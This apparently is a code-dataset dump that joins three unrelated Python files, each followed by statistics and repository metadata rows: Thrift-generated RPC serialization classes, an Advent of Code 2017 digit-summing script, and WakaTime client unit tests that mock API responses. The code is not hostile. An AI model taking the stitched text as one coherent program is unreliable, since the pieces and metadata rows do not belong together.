self.unreceived.append(_elem148)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('transfer_data_args')
if self.pass_phrase is not None:
oprot.writeFieldBegin('pass_phrase', TType.STRING, 1)
oprot.writeString(self.pass_phrase)
oprot.writeFieldEnd()
if self.received is not None:
oprot.writeFieldBegin('received', TType.LIST, 2)
oprot.writeListBegin(TType.STRING, len(self.received))
for iter149 in self.received:
oprot.writeString(iter149)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.unreceived is not None:
oprot.writeFieldBegin('unreceived', TType.LIST, 3)
oprot.writeListBegin(TType.STRING, len(self.unreceived))
for iter150 in self.unreceived:
oprot.writeString(iter150)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.pass_phrase)
value = (value * 31) ^ hash(self.received)
value = (value * 31) ^ hash(self.unreceived)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class transfer_data_result:
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.LIST, 'success', (TType.STRUCT,(VerificationRecord, VerificationRecord.thrift_spec)), None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype154, _size151) = iprot.readListBegin()
for _i155 in xrange(_size151):
_elem156 = VerificationRecord()
_elem156.read(iprot)
self.success.append(_elem156)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('transfer_data_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.STRUCT, len(self.success))
for iter157 in self.success:
iter157.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.success)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class subscription_provisioning_args:
"""
Attributes:
- subscription_id
- criteria
- phase_criteria
- create_ts
- public_key
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'subscription_id', None, None, ), # 1
(2, TType.MAP, 'criteria', (TType.STRING,None,TType.STRING,None), None, ), # 2
(3, TType.STRING, 'phase_criteria', None, None, ), # 3
(4, TType.I32, 'create_ts', None, None, ), # 4
(5, TType.STRING, 'public_key', None, None, ), # 5
)
def __init__(self, subscription_id=None, criteria=None, phase_criteria=None, create_ts=None, public_key=None,):
self.subscription_id = subscription_id
self.criteria = criteria
self.phase_criteria = phase_criteria
self.create_ts = create_ts
self.public_key = public_key
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.subscription_id = iprot.readString()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.MAP:
self.criteria = {}
(_ktype159, _vtype160, _size158 ) = iprot.readMapBegin()
for _i162 in xrange(_size158):
_key163 = iprot.readString()
_val164 = iprot.readString()
self.criteria[_key163] = _val164
iprot.readMapEnd()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.phase_criteria = iprot.readString()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.I32:
self.create_ts = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.STRING:
self.public_key = iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('subscription_provisioning_args')
if self.subscription_id is not None:
oprot.writeFieldBegin('subscription_id', TType.STRING, 1)
oprot.writeString(self.subscription_id)
oprot.writeFieldEnd()
if self.criteria is not None:
oprot.writeFieldBegin('criteria', TType.MAP, 2)
oprot.writeMapBegin(TType.STRING, TType.STRING, len(self.criteria))
for kiter165,viter166 in self.criteria.items():
oprot.writeString(kiter165)
oprot.writeString(viter166)
oprot.writeMapEnd()
oprot.writeFieldEnd()
if self.phase_criteria is not None:
oprot.writeFieldBegin('phase_criteria', TType.STRING, 3)
oprot.writeString(self.phase_criteria)
oprot.writeFieldEnd()
if self.create_ts is not None:
oprot.writeFieldBegin('create_ts', TType.I32, 4)
oprot.writeI32(self.create_ts)
oprot.writeFieldEnd()
if self.public_key is not None:
oprot.writeFieldBegin('public_key', TType.STRING, 5)
oprot.writeString(self.public_key)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.subscription_id)
value = (value * 31) ^ hash(self.criteria)
value = (value * 31) ^ hash(self.phase_criteria)
value = (value * 31) ^ hash(self.create_ts)
value = (value * 31) ^ hash(self.public_key)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class subscription_provisioning_result:
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('subscription_provisioning_result')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class subscription_request_args:
"""
Attributes:
- subscription_id
- subscription_signature
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'subscription_id', None, None, ), # 1
(2, TType.STRUCT, 'subscription_signature', (Signature, Signature.thrift_spec), None, ), # 2
)
def __init__(self, subscription_id=None, subscription_signature=None,):
self.subscription_id = subscription_id
self.subscription_signature = subscription_signature
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.subscription_id = iprot.readString()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.subscription_signature = Signature()
self.subscription_signature.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('subscription_request_args')
if self.subscription_id is not None:
oprot.writeFieldBegin('subscription_id', TType.STRING, 1)
oprot.writeString(self.subscription_id)
oprot.writeFieldEnd()
if self.subscription_signature is not None:
oprot.writeFieldBegin('subscription_signature', TType.STRUCT, 2)
self.subscription_signature.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.subscription_id)
value = (value * 31) ^ hash(self.subscription_signature)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class subscription_request_result:
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.STRUCT, 'success', (SubscriptionResponse, SubscriptionResponse.thrift_spec), None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = SubscriptionResponse()
self.success.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('subscription_request_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.success)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_peers_args:
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_peers_args')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_peers_result:
"""
Attributes:
- success
- unauthorized
"""
thrift_spec = (
(0, TType.LIST, 'success', (TType.STRUCT,(Node, Node.thrift_spec)), None, ), # 0
(1, TType.STRUCT, 'unauthorized', (UnauthorizedException, UnauthorizedException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, unauthorized=None,):
self.success = success
self.unauthorized = unauthorized
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype170, _size167) = iprot.readListBegin()
for _i171 in xrange(_size167):
_elem172 = Node()
_elem172.read(iprot)
self.success.append(_elem172)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.unauthorized = UnauthorizedException()
self.unauthorized.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_peers_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.STRUCT, len(self.success))
for iter173 in self.success:
iter173.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.unauthorized is not None:
oprot.writeFieldBegin('unauthorized', TType.STRUCT, 1)
self.unauthorized.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.success)
value = (value * 31) ^ hash(self.unauthorized)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
| 31.145719 | 188 | 0.675794 | 9,907 | 85,495 | 5.542243 | 0.026244 | 0.014206 | 0.025571 | 0.01967 | 0.875189 | 0.837671 | 0.813321 | 0.790846 | 0.764566 | 0.754986 | 0 | 0.011579 | 0.214106 | 85,495 | 2,744 | 189 | 31.15707 | 0.805611 | 0.019627 | 0 | 0.791128 | 1 | 0 | 0.032154 | 0.004399 | 0 | 0 | 0 | 0 | 0 | 1 | 0.130776 | false | 0.03281 | 0.003235 | 0.037431 | 0.259704 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
dd3a5da2f9976975c89912765827b00985d39bc8 | 2,178 | py | Python | 1-inverse-captcha.py | lawrencefoley/advent-of-code-2017 | 92b655315d1a88269ec7e13f19ddb910ccd5d78a | [
"MIT"
] | null | null | null | 1-inverse-captcha.py | lawrencefoley/advent-of-code-2017 | 92b655315d1a88269ec7e13f19ddb910ccd5d78a | [
"MIT"
] | null | null | null | 1-inverse-captcha.py | lawrencefoley/advent-of-code-2017 | 92b655315d1a88269ec7e13f19ddb910ccd5d78a | [
"MIT"
] | null | null | null | nums = "36743676522426214741687639282183216978128565594112364817283598621384839756628424146779311928318383597235968644687665159591573413233616717112157752469191845757712928347624726438516211153946892241449523148419426259291788938621886334734497823163281389389853675932246734153563861233894952657625868415432316155487242813798425779743561987563734944962846865263722712768674838244444385768568489842989878163655771847362656153372265945464128668412439248966939398765446171855144544285463517258749813731314365947372548811434646381595273172982466142248474238762554858654679415418693478512641864168398722199638775667744977941183772494538685398862344164521446115925528534491788728448668455349588972443295391385389551783289417349823383324748411689198219329996666752251815562522759374542652969147696419669914534586732436912798519697722586795746371697338416716842214313393228587413399534716394984183943123375517819622837972796431166264646432893478557659387795573234889141897313158457637142238315327877493994933514112645586351127139429281675912366669475931711974332271368287413985682374943195886455927839573986464555141679291998645936683639162588375974549467767623463935561847869527383395278248952314792112113126231246742753119748113828843917812547224498319849947517745625844819175973986843636628414965664466582172419197227695368492433353199233558872319529626825788288176275546566474824257336863977574347328469153319428883748696399544974133392589823343773897313173336568883385364166336362398636684459886283964242249228938383219255513996468586953519638111599935229115228837559242752925943653623682985576323929415445443378189472782454958232341986626791182861644112974418239286486722654442144851173538756859647218768134572858331849543266169672745221391659363674921469481143686952478771714585793322926824623482923579986434741714167134346384551362664177865452895348948953472328966995731169672573555621939584872187999325322327893336736611929752613241935211664248961527687778371971259654541239471766714469122213793348414477789271187324629397292446879752673"
sum = 0
lastNum = int(nums[0])
for num in nums:
num = int(num)
if num == lastNum:
sum += num
lastNum = num
print(sum)
| 217.8 | 2,039 | 0.968779 | 24 | 2,178 | 87.916667 | 0.458333 | 0.009479 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.953543 | 0.021579 | 2,178 | 9 | 2,040 | 242 | 0.036603 | 0 | 0 | 0 | 0 | 0 | 0.932048 | 0.932048 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.111111 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
dd9de8c51e1401cea11d48edc8ce0f4e1af0e760 | 30,755 | py | Python | vscode/extensions/WakaTime.vscode-wakatime-1.1.17/out/wakatime-master/tests/test_main.py | nlimpid/dotfiles | b78d08707992f742f984f556fa58349c2ccd095d | [
"MIT"
] | null | null | null | vscode/extensions/WakaTime.vscode-wakatime-1.1.17/out/wakatime-master/tests/test_main.py | nlimpid/dotfiles | b78d08707992f742f984f556fa58349c2ccd095d | [
"MIT"
] | 4 | 2019-06-16T09:52:03.000Z | 2019-08-18T02:11:35.000Z | vscode/extensions/WakaTime.vscode-wakatime-1.1.17/out/wakatime-master/tests/test_main.py | nlimpid/dotfiles | b78d08707992f742f984f556fa58349c2ccd095d | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from wakatime.main import execute
from wakatime.packages import requests
import logging
import os
import time
import shutil
import sys
import uuid
from testfixtures import log_capture
from wakatime.compat import u, is_py3
from wakatime.constants import (
API_ERROR,
AUTH_ERROR,
MAX_FILE_SIZE_SUPPORTED,
SUCCESS,
)
from wakatime.packages.requests.exceptions import RequestException
from wakatime.packages.requests.models import Response
from . import utils
try:
from .packages import simplejson as json
except (ImportError, SyntaxError):
import json
try:
from mock import ANY
except ImportError:
from unittest.mock import ANY
from wakatime.packages import tzlocal
class MainTestCase(utils.TestCase):
patch_these = [
'wakatime.packages.requests.adapters.HTTPAdapter.send',
'wakatime.offlinequeue.Queue.push',
['wakatime.offlinequeue.Queue.pop', None],
['wakatime.offlinequeue.Queue.connect', None],
'wakatime.session_cache.SessionCache.save',
'wakatime.session_cache.SessionCache.delete',
['wakatime.session_cache.SessionCache.get', requests.session],
['wakatime.session_cache.SessionCache.connect', None],
]
def test_500_response(self):
response = Response()
response.status_code = 500
self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].return_value = response
with utils.TemporaryDirectory() as tempdir:
entity = 'tests/samples/codefiles/twolinefile.txt'
shutil.copy(entity, os.path.join(tempdir, 'twolinefile.txt'))
entity = os.path.realpath(os.path.join(tempdir, 'twolinefile.txt'))
now = u(int(time.time()))
key = str(uuid.uuid4())
args = ['--file', entity, '--key', key,
'--config', 'tests/samples/configs/paranoid.cfg', '--time', now]
retval = execute(args)
self.assertEquals(retval, API_ERROR)
self.assertEquals(sys.stdout.getvalue(), '')
self.assertEquals(sys.stderr.getvalue(), '')
self.patched['wakatime.session_cache.SessionCache.delete'].assert_called_once_with()
self.patched['wakatime.session_cache.SessionCache.get'].assert_called_once_with()
self.patched['wakatime.session_cache.SessionCache.save'].assert_not_called()
heartbeat = {
'language': 'Text only',
'lines': 2,
'entity': 'HIDDEN.txt',
'project': os.path.basename(os.path.abspath('.')),
'time': float(now),
'type': 'file',
}
stats = {
u('cursorpos'): None,
u('dependencies'): [],
u('language'): u('Text only'),
u('lineno'): None,
u('lines'): 2,
}
self.patched['wakatime.offlinequeue.Queue.push'].assert_called_once_with(ANY, ANY, None)
for key, val in self.patched['wakatime.offlinequeue.Queue.push'].call_args[0][0].items():
self.assertEquals(heartbeat[key], val)
self.assertEquals(stats, json.loads(self.patched['wakatime.offlinequeue.Queue.push'].call_args[0][1]))
self.patched['wakatime.offlinequeue.Queue.pop'].assert_not_called()
self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].assert_called_once_with(
ANY, cert=None, proxies={}, stream=False, timeout=60, verify=True,
)
def test_400_response(self):
response = Response()
response.status_code = 400
self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].return_value = response
with utils.TemporaryDirectory() as tempdir:
entity = 'tests/samples/codefiles/twolinefile.txt'
shutil.copy(entity, os.path.join(tempdir, 'twolinefile.txt'))
entity = os.path.realpath(os.path.join(tempdir, 'twolinefile.txt'))
now = u(int(time.time()))
key = str(uuid.uuid4())
args = ['--file', entity, '--key', key,
'--config', 'tests/samples/configs/paranoid.cfg', '--time', now]
retval = execute(args)
self.assertEquals(retval, API_ERROR)
self.assertEquals(sys.stdout.getvalue(), '')
self.assertEquals(sys.stderr.getvalue(), '')
self.patched['wakatime.session_cache.SessionCache.delete'].assert_called_once_with()
self.patched['wakatime.session_cache.SessionCache.get'].assert_called_once_with()
self.patched['wakatime.session_cache.SessionCache.save'].assert_not_called()
self.patched['wakatime.offlinequeue.Queue.push'].assert_not_called()
self.patched['wakatime.offlinequeue.Queue.pop'].assert_not_called()
self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].assert_called_once_with(
ANY, cert=None, proxies={}, stream=False, timeout=60, verify=True,
)
def test_401_response(self):
response = Response()
response.status_code = 401
self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].return_value = response
with utils.TemporaryDirectory() as tempdir:
entity = 'tests/samples/codefiles/twolinefile.txt'
shutil.copy(entity, os.path.join(tempdir, 'twolinefile.txt'))
entity = os.path.realpath(os.path.join(tempdir, 'twolinefile.txt'))
now = u(int(time.time()))
key = str(uuid.uuid4())
args = ['--file', entity, '--key', key,
'--config', 'tests/samples/configs/paranoid.cfg', '--time', now]
retval = execute(args)
self.assertEquals(retval, AUTH_ERROR)
self.assertEquals(sys.stdout.getvalue(), '')
self.assertEquals(sys.stderr.getvalue(), '')
self.patched['wakatime.session_cache.SessionCache.delete'].assert_called_once_with()
self.patched['wakatime.session_cache.SessionCache.get'].assert_called_once_with()
self.patched['wakatime.session_cache.SessionCache.save'].assert_not_called()
heartbeat = {
'language': 'Text only',
'lines': 2,
'entity': 'HIDDEN.txt',
'project': os.path.basename(os.path.abspath('.')),
'time': float(now),
'type': 'file',
}
stats = {
u('cursorpos'): None,
u('dependencies'): [],
u('language'): u('Text only'),
u('lineno'): None,
u('lines'): 2,
}
self.patched['wakatime.offlinequeue.Queue.push'].assert_called_once_with(ANY, ANY, None)
for key, val in self.patched['wakatime.offlinequeue.Queue.push'].call_args[0][0].items():
self.assertEquals(heartbeat[key], val)
self.assertEquals(stats, json.loads(self.patched['wakatime.offlinequeue.Queue.push'].call_args[0][1]))
self.patched['wakatime.offlinequeue.Queue.pop'].assert_not_called()
self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].assert_called_once_with(
ANY, cert=None, proxies={}, stream=False, timeout=60, verify=True,
)
@log_capture()
def test_500_response_without_offline_logging(self, logs):
logging.disable(logging.NOTSET)
response = Response()
response.status_code = 500
response._content = 'fake content'
if is_py3:
response._content = 'fake content'.encode('utf8')
self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].return_value = response
with utils.TemporaryDirectory() as tempdir:
entity = 'tests/samples/codefiles/twolinefile.txt'
shutil.copy(entity, os.path.join(tempdir, 'twolinefile.txt'))
entity = os.path.realpath(os.path.join(tempdir, 'twolinefile.txt'))
now = u(int(time.time()))
key = str(uuid.uuid4())
args = ['--file', entity, '--key', key, '--disableoffline',
'--config', 'tests/samples/configs/good_config.cfg', '--time', now]
retval = execute(args)
self.assertEquals(retval, API_ERROR)
self.assertEquals(sys.stdout.getvalue(), '')
self.assertEquals(sys.stderr.getvalue(), '')
log_output = u("\n").join([u(' ').join(x) for x in logs.actual()])
expected = "WakaTime ERROR {'response_code': 500, 'response_content': u'fake content'}"
if log_output[-2] == '0':
expected = "WakaTime ERROR {'response_content': u'fake content', 'response_code': 500}"
if is_py3:
expected = "WakaTime ERROR {'response_code': 500, 'response_content': 'fake content'}"
if log_output[-2] == '0':
expected = "WakaTime ERROR {'response_content': 'fake content', 'response_code': 500}"
self.assertEquals(expected, log_output)
self.patched['wakatime.session_cache.SessionCache.delete'].assert_called_once_with()
self.patched['wakatime.session_cache.SessionCache.get'].assert_called_once_with()
self.patched['wakatime.session_cache.SessionCache.save'].assert_not_called()
self.patched['wakatime.offlinequeue.Queue.push'].assert_not_called()
self.patched['wakatime.offlinequeue.Queue.pop'].assert_not_called()
self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].assert_called_once_with(
ANY, cert=None, proxies={}, stream=False, timeout=60, verify=True,
)
@log_capture()
def test_requests_exception(self, logs):
logging.disable(logging.NOTSET)
self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].side_effect = RequestException('requests exception')
with utils.TemporaryDirectory() as tempdir:
entity = 'tests/samples/codefiles/twolinefile.txt'
shutil.copy(entity, os.path.join(tempdir, 'twolinefile.txt'))
entity = os.path.realpath(os.path.join(tempdir, 'twolinefile.txt'))
now = u(int(time.time()))
key = str(uuid.uuid4())
args = ['--file', entity, '--key', key, '--verbose',
'--config', 'tests/samples/configs/good_config.cfg', '--time', now]
retval = execute(args)
self.assertEquals(retval, API_ERROR)
self.assertEquals(sys.stdout.getvalue(), '')
self.assertEquals(sys.stderr.getvalue(), '')
log_output = u("\n").join([u(' ').join(x) for x in logs.actual()])
expected = 'Parsing dependencies not supported for special.TextParser'
self.assertIn(expected, log_output)
expected = 'WakaTime DEBUG Sending heartbeat to api at https://api.wakatime.com/api/v1/heartbeats'
self.assertIn(expected, log_output)
expected = "RequestException': u'requests exception'"
if is_py3:
expected = "RequestException': 'requests exception'"
self.assertIn(expected, log_output)
self.patched['wakatime.session_cache.SessionCache.delete'].assert_called_once_with()
self.patched['wakatime.session_cache.SessionCache.get'].assert_called_once_with()
self.patched['wakatime.session_cache.SessionCache.save'].assert_not_called()
heartbeat = {
'language': 'Text only',
'lines': 2,
'entity': entity,
'project': os.path.basename(os.path.abspath('.')),
'time': float(now),
'type': 'file',
}
stats = {
u('cursorpos'): None,
u('dependencies'): [],
u('language'): u('Text only'),
u('lineno'): None,
u('lines'): 2,
}
self.patched['wakatime.offlinequeue.Queue.push'].assert_called_once_with(ANY, ANY, None)
for key, val in self.patched['wakatime.offlinequeue.Queue.push'].call_args[0][0].items():
self.assertEquals(heartbeat[key], val)
self.assertEquals(stats, json.loads(self.patched['wakatime.offlinequeue.Queue.push'].call_args[0][1]))
self.patched['wakatime.offlinequeue.Queue.pop'].assert_not_called()
self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].assert_called_once_with(
ANY, cert=None, proxies={}, stream=False, timeout=60, verify=True,
)
@log_capture()
def test_requests_exception_without_offline_logging(self, logs):
logging.disable(logging.NOTSET)
self.patched['wakatime.packages.requests.adapters.HTTPAdapter.send'].side_effect = RequestException('requests exception')
with utils.TemporaryDirectory() as tempdir:
entity = 'tests/samples/codefiles/twolinefile.txt'
shutil.copy(entity, os.path.join(tempdir, 'twolinefile.txt'))
entity = os.path.realpath(os.path.join(tempdir, 'twolinefile.txt'))
now = u(int(time.time()))
key = str(uuid.uuid4())
args = ['--file', entity, '--key', key, '--disableoffline',
'--config', 'tests/samples/configs/good_config.cfg', '--time', now]
retval = execute(args)
self.assertEquals(retval, API_ERROR)
self.assertEquals(sys.stdout.getvalue(), '')
self.assertEquals(sys.stderr.getvalue(), '')
log_output = u("\n").join([u(' ').join(x) for x in logs.actual()])
expected = "WakaTime ERROR {'RequestException': u'requests exception'}"
if is_py3:
expected = "WakaTime ERROR {'RequestException': 'requests exception'}"
self.assertEquals(expected, log_output)
self.patched['wakatime.session_cache.SessionCache.delete'].assert_called_once_with()
